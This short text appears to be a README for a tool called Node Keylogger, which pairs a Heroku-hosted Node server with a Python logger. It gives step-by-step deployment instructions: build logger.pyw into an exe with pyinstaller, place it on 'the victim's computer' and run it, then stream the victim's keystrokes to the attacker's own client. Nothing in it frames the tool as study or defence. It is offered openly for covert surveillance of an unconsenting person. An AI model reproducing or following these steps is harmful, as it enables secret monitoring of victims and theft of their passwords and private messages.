Node Keylogger is a keylogger program made with Node & Python
-
Upload server.js file to heroku and run it with
npm startcommand. -
Fill
lib.jsonfile. Note:controllerServerURLis your heroku app url -
Using a exe builder module like
pyinstaller, build an exe file for logger.pyw -
Upload the exe file to the victim's computer and run it (double click)
-
Run client.js file on your own computer
npm run clientNow Keylogger system is on, you can get all keyboard activities of victim
- NodeJS
- Python
- Socket.io
- Socket.io-client
- Heroku (for hosting)
- Pynput module for python
